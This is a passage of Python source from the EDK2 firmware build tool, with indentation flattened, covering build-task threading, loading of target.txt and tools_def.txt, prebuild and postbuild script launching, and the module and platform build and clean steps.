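    #   ExitFlag.set()                                         # all tasks queued
    #   BuildTask.WaitForComplete()
    #   if BuildTask.HasError():
    #       EdkLogger.error("build", BUILD_ERROR, BuildTask.GetErrorMessage())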
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
        # flag indicating the build is complete, used to avoid unnecessary re-builds
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
            # TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
        # indicate a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
    #   @param  BaseName          The base name of the image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
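        # Round the image size up to the next 4 KiB (0x1000) page boundary; note that the
        # expression below always adds one extra page, even when Size is already aligned
        # (e.g. 0x3200 -> 0x4000, and 0x3000 -> 0x4000 as well).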
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parsing all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
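#
# Illustrative command line that drives this process (example values only):
#
#   build -p Nt32Pkg/Nt32Pkg.dsc -a IA32 -t VS2015x86 -b DEBUG
#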
class Build():
## Constructor
#
    # Constructor will load all necessary configurations, parse the platform, modules
    # and packages, and then establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
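        # Sanity checks for the binary cache options below: --binary-destination and
        # --binary-source each require --hash, and the two options are mutually exclusive.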
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
                # Get the standard WORKSPACE/Conf directory, using the absolute path to WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
self.Db = WorkspaceDatabase()
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
        # print a dot character while doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
            # WORKSPACE env has been converted before. Print the same path style as the WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
            # Print the same path style as the WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append(TAB_COMPILER_MSFT)
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber is None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
try:
self.ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
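    # Illustrative Conf/target.txt entries consumed by LoadConfiguration() above
    # (key names follow the usual EDK2 template; the values are examples only):
    #
    #   ACTIVE_PLATFORM              = Nt32Pkg/Nt32Pkg.dsc
    #   TARGET                       = DEBUG
    #   TARGET_ARCH                  = IA32 X64
    #   TOOL_CHAIN_CONF              = Conf/tools_def.txt
    #   TOOL_CHAIN_TAG               = VS2015x86
    #   MAX_CONCURRENT_THREAD_NUMBER = 8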
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
        # Allow case-insensitive matching for values from the command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db_Flag = True
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
                BuildStr += ' -p ' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
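    # Illustrative value returned by PassCommandOption() (example values only); note that
    # only the options missing from the original command line are appended:
    #
    #   ' -b DEBUG -a X64 -t VS2015x86 -p Nt32Pkg/Nt32Pkg.dsc --conf=/path/to/Conf all'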
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
            # The purpose of the .PrebuildEnv file is to capture environment variable settings set by the
            # prebuild script and preserve them for the rest of the main build step, because the child
            # process environment evaporates as soon as it exits and cannot be read during the build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
                EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process was not successful!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = itertools.imap(lambda l: l.split('=', 1), envs)
envs = itertools.ifilter(lambda l: len(l) == 2, envs)
envs = itertools.imap(lambda l: [i.strip() for i in l], envs)
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
                EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process was not successful!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
    # Create autogen code and makefile for a module or platform, and then launch
    # the "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
        # skip file generation for the cleanxxx, run and fds targets
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
    # Create autogen code and makefile for a module or platform, and then launch
    # the "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
        # skip file generation for the cleanxxx, run and fds targets
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
    ## Rebase module images and get function addresses for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
